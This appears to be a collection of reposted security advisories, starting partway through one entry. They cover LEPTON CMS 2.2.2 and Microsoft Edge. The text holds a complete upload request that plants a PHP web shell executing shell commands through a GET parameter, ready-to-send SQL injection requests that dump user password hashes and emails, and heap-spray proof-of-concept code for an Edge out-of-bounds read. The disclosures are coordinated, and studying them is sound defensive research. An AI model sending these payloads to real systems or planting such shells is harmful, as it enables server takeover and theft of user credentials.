Content-Disposition: form-data; name="action" media_upload
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="current_dir"
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png <?
php passthru($_GET['x']);
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="submit" Upload File(s)
-----------------------------38397165016927337851258279296-- http://localhost/
LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
HireHackking

LEPTON 2.2.2 - SQL Injection 

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:           2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/
                    important-lepton-2.3.0-101.php
Vendor Website:     http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to        11/10/2016
public:
Release mode:       Coordinated Release
CVE:                n/a
Credits             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=
3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 154 search_scope=title&terms=" union select
username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=
dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()&
visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&
leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=
f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool=
droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute=
'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&
Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&
Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
HireHackking 
<!--
Source: http://blog.skylined.nl/20161118002.html

Synopsis

A specially crafted web-page can cause an integer underflow in Microsoft Edge. This causes CText­Extractor::Get­Block­Text to read data outside of the bounds of a memory block.

Known affected software, attack vectors and mitigations

Microsoft Edge 11.0.10240.16384

An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.

Repro.html

<!DOCTYPE html>
<style>
  *::first-letter{ border: 0; }
  *{ white-space: pre-line; }
</style>
<body>
  A<script>alert();</script>&#x­D;&#x­D;B
</body>

Description

Though I did not investigate thoroughly, I did find out the following:

The root cause appears to be an integer underflow in a 32-bit variable used in CText­Extractor..Get­Block­Text as an index to read a WCHAR in a string buffer. This index is decreased once too often and becomes -1, or a very large positive number depending on how it is used.
This does not result in a crash on 32-bit systems, as an integer wrap causes the code to read one WCHAR before the start of the buffer, which is normally also in allocated memory.
On 64-bit systems, the 32-bit -1 value is interpreted as 0x­FFFFFFFF, a very large positive value. As this is an index into a WCHAR string, it gets multiplied by two and added to the start of the buffer to find the location of a WCHAR to read. This causes the OOB read to be around 8Gb (!!) beyond the address at which the buffer is allocated.
The crash happens in code that appears to be rendering the web-page, which does not immediately offer an obvious way of extracting information using this bug.

Exploit

This is where it gets interesting, as the OOB read happens approximately 0x2`00000000 bytes after the address at which the buffer is allocated. This presents us with a problem: how to store some information that we'd be interested in reading at such a large offset from the original allocation?

As one might come to expect from me, I used a heap spray. But it needed to be a special kind of heap spray as I did not want to actually have to allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I developed a heap spray that uses significantly less RAM than a traditional heap spray does; in practice probably about 33% in most cases, but theoretically much more in ideal situations. I've been meaning to blog about it, but never found the time to do so until today: you can read all about it here.

That said, I have not actually looked at whether it is possible to exfiltrate useful information using this bug. However, I did write a Proof-of-Concept that attempts to make sure something is allocated in the area where the OOB read happens. This Po­C uses these heap spray tricks to spray the heap while minimizing memory use. The Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb distance from the buffer (up to ~10Gb to be sure). When you load the Po­C in a 64-bit version of Edge, you may notice that, unlike the original repro, it will not crash Edge (even though it does trigger the issues): the heap spray has allocated the memory that the out-of-bounds read accesses, and this prevents an access violation exception. Refreshing the page is likely to screw up the precise allocation process needed and will probably cause a crash.

This proves that it is theoretically possible to allocate information at the address used by the code. All that is left is prove that the information read by the code can be exfiltrated somehow, and you have a working exploit. This is left as an exercises to the reader.
-->

<!DOCTYPE html>
<style>
  *::first-letter{ border: 0; }
  *{ white-space: pre-line; }
</style>
<body>
  A<script>
    var ai­Allocation­Sizes = [             // max address ------.    .---- RAM allocated
      -0x4000, //  4000                                      4000  4000
       0x1000, //    |   1000                                5000  5000
      -0x5000, // -4000    |   5000                          a000  6000
       0x5000, //          |     |   5000                    f000  b000
      -0x7000, //          |  -5000    |   7000             16000  d000
       0x6000, //          |           |     |   6000       1c000 13000
      -0x8000, //          |           |  -7000    |   8000 24000 14000 (5.3Gb)
    ];
    var ao­Heap = [],
        o­To­Be­Freed;
    ai­Allocation­Sizes.for­Each(function (i­Allocation­Size) {
      if (i­Allocation­Size < 0 && o­To­Be­Freed) {
        console.log("-0x" + o­To­Be­Freed.byte­Length.to­String(16));
        o­To­Be­Freed = null; // Free the heap block that was queued to be freed.
        Collect­Garbage();
      }
      var u­Allocation­Size = Math.abs(i­Allocation­Size) * 0x10000 - 1;
      console.log("+0x" + u­Allocation­Size.to­String(16));
      var o­Array­Buffer = new Array­Buffer(u­Allocation­Size);
      if (i­Allocation­Size < 0) {
        o­To­Be­Freed = o­Array­Buffer; // Schedule this to be freed
      } else {
        //ao­Heap.push(o­Array­Buffer);
      }
    });
  </script>&#x­D;&#x­D;B
</body>

<!--
Time-line

June 2016: This vulnerability was found through fuzzing.
June 2016: This vulnerability was submitted to ZDI and i­Defense.
July 2016: This vulnerability was acquired by ZDI.
September 2016: This vulnerability was addressed by Microsoft in MS16-104.
November 2016: Details of this issue are released.
-->